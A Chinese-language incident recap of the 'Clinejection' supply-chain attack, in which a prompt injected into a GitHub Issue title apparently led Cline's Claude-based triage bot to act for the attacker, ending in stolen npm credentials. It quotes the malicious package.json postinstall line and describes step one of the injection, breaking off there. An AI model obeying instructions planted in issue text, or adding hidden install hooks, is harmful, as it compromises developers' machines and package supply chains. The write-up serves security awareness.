工具推荐
Clinejection 事件复盘:一个 GitHub Issue 标题如何入侵 4000 台开发者电脑
安全研究员还原 Clinejection 攻击全链条:攻击者通过在 GitHub Issue 标题中注入 prompt,诱导 Cline 的 AI 分类机器人执行恶意代码,最终窃取 npm 发布凭证并植入后门,约 4000 名开发者受影响。
Clinejection 事件复盘:一个 GitHub Issue 标题如何入侵 4000 台开发者电脑
工具推荐
事件概要
2026 年 2 月 17 日,有人在 npm 发布了 cline@2.3.0。这个版本看起来和前一版一模一样,唯一的变化是 package.json 多了一行:
json"postinstall": "npm install -g openclaw@latest"
在接下来 8 小时内,约 4000 名开发者在安装或更新 Cline 时,被悄悄安装了一个具有完整系统权限的 AI Agent。
攻击链还原(5 步)
第 1 步:Prompt 注入
Cline 使用了 Anthropic 的 claude-code-action 做 AI 自动分类 Issue。配置中 allowed_non_write_users: "*",意味着任何人都能触发。Issue 标题直接拼接进 Claude 的 prompt,没有任何过滤。
攻击者创建了一个 Issue,标题伪装成性能报告,但内嵌了指令——让 Claude 安装一个恶意包。